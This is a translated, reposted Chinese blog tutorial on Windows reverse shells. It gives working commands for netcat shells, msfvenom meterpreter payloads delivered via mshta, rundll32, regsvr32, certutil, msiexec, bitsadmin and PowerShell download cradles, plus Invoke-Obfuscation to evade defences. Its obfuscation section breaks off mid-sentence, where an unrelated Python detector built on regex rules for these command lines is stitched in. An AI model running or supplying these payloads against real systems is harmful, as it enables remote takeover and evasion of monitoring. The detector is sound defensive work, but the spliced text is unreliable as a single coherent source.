Windows Reverse Shell Techniques (Window反弹shell大法)

admin · 2021-08-27 14:32:41 · 534 views · 6086 characters · 20 min 17 s read

Windows reverse shell methods

/01 Introduction to reverse shells

I. What is a forward (bind) shell

Forward shell: the controller actively initiates the connection to the controlled host, and nothing in the network path in between blocks it.

In practice the host being connected to usually sits inside an internal network, so this is often not feasible.

II. What is a reverse shell

Reverse shell (反弹shell): the controlled host actively initiates the connection back to the controller. This is used because the controlled host often cannot normally receive inbound packets, due to firewall restrictions, insufficient privileges, the port already being in use, and similar problems.

/02 Windows reverse shells

I. NC forward shell

1. Controlled host:

# Note that -e here is cmd.exe, which means
nc -lvvp 6666 -e cmd.exe

2. Controller:

nc 192.168.96.129 6666

3. How it works:

The controlled host redirects cmd.exe to its local port 6666; the controller connects to port 6666 on the controlled host and obtains a shell.

II. NC reverse shell

1. Controller:

nc -lvvp 7777

2. Controlled host:

nc -e cmd.exe 192.168.96.129 7777

3. How it works:

The controlled host redirects cmd.exe to port 6666 on the controller; the controller only needs to listen on its local port 6666 to obtain a shell.

III. Mshta.exe

Mshta.exe is the Windows OS utility responsible for interpreting and running HTA (HTML Application) files. It can run HTML files containing JavaScript or VBScript.

1. Launching an HTA attack via Metasploit's HTA Web Server module

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.78.117
msf exploit(windows/misc/hta_server) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/misc/hta_server) > set target 1
msf exploit(windows/misc/hta_server) > exploit -j

mshta http://192.168.78.117:8080/9A5Iiz.hta

Meterpreter session obtained.

2. Generating a malicious HTA file with Msfvenom

Controller

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.96.128 lport=4444 -f hta-psh -o 1.hta

msf5 > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.96.128 -P 4444

python -m SimpleHTTPServer 8000

Controlled host

mshta.exe http://192.168.78.117:8000/1.hta

IV. Rundll32.exe

Rundll32.exe is part of the Windows operating system; it allows functions exported from DLLs (16-bit or 32-bit) to be called and stored in the appropriate memory library.

1. Launching a Rundll32 attack via Metasploit's SMB Delivery module

use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.96.128
msf exploit(windows/smb/smb_delivery) > exploit -j

rundll32.exe \\192.168.96.128\dzLN\test.dll,0

Shell obtained.

2. Generating a reverse-shell DLL with Msfvenom and launching it with Rundll32

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.96.128 LPORT=53 -f dll > mingy.dll

Start the listener:

msf6 exploit(windows/smb/smb_delivery) > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.96.128 -P 53

Load locally:

Transfer the file to the controlled host first.

rundll32 shell32.dll,Control_RunDLL C:\Users\admin\Downloads\abaaba.dll

Shell obtained.

3. Loading an HTA with Rundll32 for a reverse shell

Generate the HTA:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.96.128 lport=7777 -f hta-psh > 44.hta

Upload the HTA via file transfer so that it lands on disk:

bitsadmin /transfer shell http://192.168.96.128:8000/44.hta C:\Users\admin\Downloads\44.hta

Load it on the controlled host:

rundll32.exe url.dll,OpenURL 44.hta

Shell obtained.

V. Regsvr32.exe

Regsvr32.exe is a command-line application used to register and unregister OLE controls, such as DLLs and ActiveX controls, in the Windows registry. Regsvr32.exe is installed in the %systemroot%\System32 folder on Windows XP and later versions of Windows.

Syntax: Regsvr32 [/s] [/u] [/n] [/i[:cmdline]] <dllname>

/u - unregister the server

/i - call DllInstall, passing it the optional [cmdline]; when used together with /u, it calls the DLL to uninstall

/n - do not call DllRegisterServer; this option must be used together with /i

/s - silent; do not display message boxes

1. Launching Regsvr32 via Metasploit's Web Delivery module

use exploit/multi/script/web_delivery
msf exploit (web_delivery)> set srvhost 192.168.96.128
msf exploit (web_delivery)> set target 3
msf exploit (web_delivery)> set payload windows/x64/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.96.128
msf exploit (web_delivery)> exploit -j

regsvr32 /s /n /u /i:http://192.168.96.128:8080/NE67gb2mbfQt.sct scrobj.dll

Shell obtained.

VI. Certutil.exe

Certutil.exe is a command-line program installed as part of Certificate Services. We can use this tool to execute a malicious exe on the target machine and obtain a meterpreter session.

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.96.128 lport=6666 -f exe > 44.exe

python -m SimpleHTTPServer 8000

Start the listener.

certutil.exe -urlcache -split -f http://192.168.96.128:8000/44.exe C:\Users\admin\Downloads\44.exe & start C:\Users\admin\Downloads\44.exe

Shell obtained.

Delete the URL cache entry:

certutil.exe -urlcache -split -f http://192.168.96.128:8000/44.exe delete

VII. Powershell.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.96.128 lport=8899 -f psh-reflection -o shell8899.ps1

python3 -m http.server 8000

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.96.128:8000/shell8899.ps1');shell8899.ps1";

Shell obtained.

1. Launching a Powercat attack via PowerShell

Powercat is a PowerShell-native backdoor listener and reverse shell tool, also described as a modified version of netcat, because it has built-in support for encoded payloads.

Clone the ps1:

git clone https://github.com/besimorhino/powercat.git

python -m SimpleHTTPServer 8000

Start the listener.

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.96.128:8000/powercat.ps1');powercat -c 192.168.96.128 -p 12345 -e cmd"

Shell obtained.

2. Reverse shell via Web Delivery

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
msf exploit(web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(web_delivery) > exploit -j

3. Launching cscript.exe via PowerShell

PowerShell allows the client to run wsf, js and vbscript scripts by executing cscript.exe.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.96.128 LPORT=7777 -f vbs -o 3.vbs

python -m SimpleHTTPServer 8000

msf5 > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.96.128 -P 7777

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://192.168.96.128:8000/3.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""

4. Launching a BAT file attack via PowerShell

PowerShell allows the client to execute bat files.

msfvenom -p cmd/windows/powershell_reverse_tcp lhost=192.168.96.128 lport=8888 -o 1.bat

msf > handler -p cmd/windows/powershell_reverse_tcp -H 192.168.1.227 -P 4455

python -m SimpleHTTPServer 8000

powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.96.128:8000/1.bat'))"

VIII. Msiexec.exe

Launching an msiexec attack via Metasploit

Windows ships with the Windows Installer engine; MSI packages are interpreted and installed by msiexec.exe.

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.96.128 lport=8888 -f msi > 1.msi

python -m SimpleHTTPServer

msf > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.96.128 -P 8888

msiexec /q /i http://192.168.96.128:8000/1.msi

Shell obtained.

IX. Metasploit

Generating a malicious exe with Metasploit to launch the attack

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.96.128 LPORT=4445 -f exe -o 1.exe

python -m SimpleHTTPServer 8000

msf5 > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.96.128 -P 4445

powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.96.128:8000/1.exe','1.exe');start 1.exe

Shell obtained.

The same command with parameters added to hide the window:

powershell -ep bypass -nop -w hidden (new-object system.net.webclient).downloadfile('http://192.168.96.128:8000/1.exe','1.exe');start-process 1.exe

X. PowerShell code obfuscation

Launch Invoke-Obfuscation:

Powershell -ep bypass
Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation

Set the location of the script to obfuscate:

set scriptpath C:\Users\mingy\Desktop\mx\Invoke-Obfuscation\pp.ps1

Choose the obfuscation method TOKEN\ALL\1.

Save the obfuscated script: out ppp.ps1

Running the original, unobfuscated script is blocked:
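The command lines in sections III to IX share a small set of host-side indicators: a signed system binary (mshta, rundll32, regsvr32, certutil, msiexec, bitsadmin) fetching content from an HTTP URL or a UNC path, a download cradle in a PowerShell argument, or nc started with -e. The detector below is an added example written for this page, not code from the article or from Metasploit. It runs a few regex rules over constructed Sysmon Event ID 1-style process-creation records; the Image and CommandLine values are sample data built from the commands above plus three benign entries, not real telemetry.

```python
import ntpath
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields),
# modelled on the command lines in this article. Not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://192.168.78.117:8080/9A5Iiz.hta"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe \\192.168.96.128\dzLN\test.dll,0"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe url.dll,OpenURL 44.hta"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32 /s /n /u /i:http://192.168.96.128:8080/NE67gb2mbfQt.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://192.168.96.128:8000/44.exe C:\Users\admin\Downloads\44.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /q /i http://192.168.96.128:8000/1.msi"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -windowstyle hidden -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.96.128:8000/shell8899.ps1')\""},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer shell http://192.168.96.128:8000/44.hta C:\Users\admin\Downloads\44.hta"},
    {"Image": r"C:\Tools\nc.exe",
     "CommandLine": "nc -e cmd.exe 192.168.96.129 7777"},
    # Benign activity that must not be flagged (constructed):
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s C:\Program Files\Vendor\comctl.dll"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\Users\admin\Downloads\setup.msi"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
]

URL = r"https?://"

# Each rule: (name, image basename it applies to, regexes that must ALL match the command line).
RULES = [
    ("mshta_remote_hta", "mshta.exe", [re.compile(URL, re.I)]),
    # UNC path as the DLL argument: \\host\share\...
    ("rundll32_unc_dll", "rundll32.exe", [re.compile(r"\\\\[\w.-]+\\", re.I)]),
    ("rundll32_url_openurl", "rundll32.exe", [re.compile(r"url\.dll,\s*OpenURL", re.I)]),
    # Scriptlet (.sct) pulled over HTTP through scrobj.dll's DllInstall.
    ("regsvr32_scriptlet", "regsvr32.exe",
     [re.compile(r"/i:\S*" + URL, re.I), re.compile(r"scrobj\.dll", re.I)]),
    ("certutil_download", "certutil.exe", [re.compile(r"-urlcache.*" + URL, re.I)]),
    ("msiexec_remote_package", "msiexec.exe", [re.compile(r"/i\s+" + URL, re.I)]),
    ("powershell_download_cradle", "powershell.exe",
     [re.compile(r"\bIEX\b|Invoke-Expression|DownloadString|DownloadFile", re.I)]),
    ("bitsadmin_transfer", "bitsadmin.exe", [re.compile(r"/transfer\b.*" + URL, re.I)]),
    # Covers both the bind (-lvvp ... -e cmd.exe) and reverse (-e cmd.exe host port) forms.
    ("netcat_exec", "nc.exe", [re.compile(r"-e\s+cmd(\.exe)?\b", re.I)]),
]


def detect(event):
    """Return the names of every rule the event matches (empty list if nothing fires)."""
    image = ntpath.basename(event["Image"]).lower()  # ntpath handles Windows separators on any OS
    cmd = event["CommandLine"]
    return [name for name, binary, patterns in RULES
            if image == binary and all(p.search(cmd) for p in patterns)]


def scan(events):
    """Return (command line, [rule names]) for each flagged event; benign events are omitted."""
    results = []
    for event in events:
        hits = detect(event)
        if hits:
            results.append((event["CommandLine"], hits))
    return results


if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_EVENTS):
        print(f"{', '.join(hits):28s} {cmd}")
```

Run it as a script to print the flagged events with the rule that fired. Command-line pattern matching is exactly what the token obfuscation in section X is designed to evade, so in production these rules belong next to PowerShell Script Block Logging (Event ID 4104), which records the script text after de-obfuscation as it executes, and next to parent-process context: an Office or browser process spawning mshta or regsvr32 deserves far more suspicion than an installer doing the same.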

FROM: https://ailumao.cn/ | Author: Ailumao

Reposted on CN-SEC中文网; please keep the original link when reprinting: http://cn-sec.com/archives/475106.html